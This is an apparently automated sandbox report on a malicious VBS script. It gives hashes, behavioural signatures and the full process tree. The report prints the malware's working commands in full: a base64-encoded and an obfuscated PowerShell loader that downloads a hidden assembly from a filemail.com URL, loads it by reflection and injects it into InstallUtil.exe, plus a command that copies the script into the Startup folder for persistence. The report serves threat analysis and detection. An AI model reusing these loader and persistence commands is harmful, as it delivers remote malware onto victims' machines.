Analysis
-
max time kernel
95s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 01:26
Static task
static1
Behavioral task
behavioral1
Sample
61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs
Resource
win7-20241010-en
General
-
Target
61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs
-
Size
12KB
-
MD5
8825e4591cadaec1fb1d0082f84c2398
-
SHA1
39fca0a522686f7b9b2b9dc5e5874aebcf231159
-
SHA256
61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
-
SHA512
d5b9c70136aaef8ca9aa1dfb32225632b69de90310ba4f9dcf35567ed58cfd6da8a6fbede4714a19ff41310af0e04bc54c7c6a95060840918efc5a31893fa2c9
-
SSDEEP
96:J86ymyaynXnLbv+mfupmtsgOgjAC9LFgtYif8fTFsgH2vX5bUdnL7vcumuZ4Y5Wx:JttRS/GpqDzj1eUhDH2Rb8RX1GHRkfkx
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 4456 WScript.exe 5 4456 WScript.exe 28 832 powershell.exe 36 832 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 3740 powershell.exe 2300 powershell.exe 832 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 832 set thread context of 4292 832 powershell.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 4448 cmd.exe 1976 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3740 powershell.exe 3740 powershell.exe 2300 powershell.exe 2300 powershell.exe 832 powershell.exe 832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 3740 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 4292 InstallUtil.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exedescription pid process target process PID 4456 wrote to memory of 4448 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 4448 4456 WScript.exe cmd.exe PID 4448 wrote to memory of 1976 4448 cmd.exe PING.EXE PID 4448 wrote to memory of 1976 4448 cmd.exe PING.EXE PID 4448 wrote to memory of 3740 4448 cmd.exe powershell.exe PID 4448 wrote to memory of 3740 4448 cmd.exe powershell.exe PID 4456 wrote to memory of 2300 4456 WScript.exe powershell.exe PID 4456 wrote to memory of 2300 4456 WScript.exe powershell.exe PID 2300 wrote to memory of 832 2300 powershell.exe powershell.exe PID 2300 wrote to memory of 832 2300 powershell.exe powershell.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe PID 832 wrote to memory of 4292 832 powershell.exe InstallUtil.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5731e9e4becec0b1ef9caad4b3562d4b4
SHA16dffb77aba4e92ad5bd4b7c02fdee6f328bcd457
SHA25671c7eca538938fa4d5b470fee41cfe43734e9beb9ae409d5b41111fa1a15c2d5
SHA512841cf559ae5b0feec4be43018717641399b3602a553112e98b07d498f1a44169924466abc7e2313b8e8cf1c0fdc1bb7635e2818aab8269b0ef349a0ba0cd6ae5
-
Filesize
64B
MD552a447f8d634b26ced145134b6d16759
SHA1e3beec9fed95623719bca43e1d6f9bef35795ad5
SHA2563f748a6fc6fd834d2aa92f2741db796ed67fb4ceb5f4713d9c6660bb114c274f
SHA5123404ed0a8aff0ddc00a31dceca14617b499c37f59334593442966be624104379371e023456fcb7697a097ef30ad9921c34261c19d4f76d8ef9aa3ecdba77dd2e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82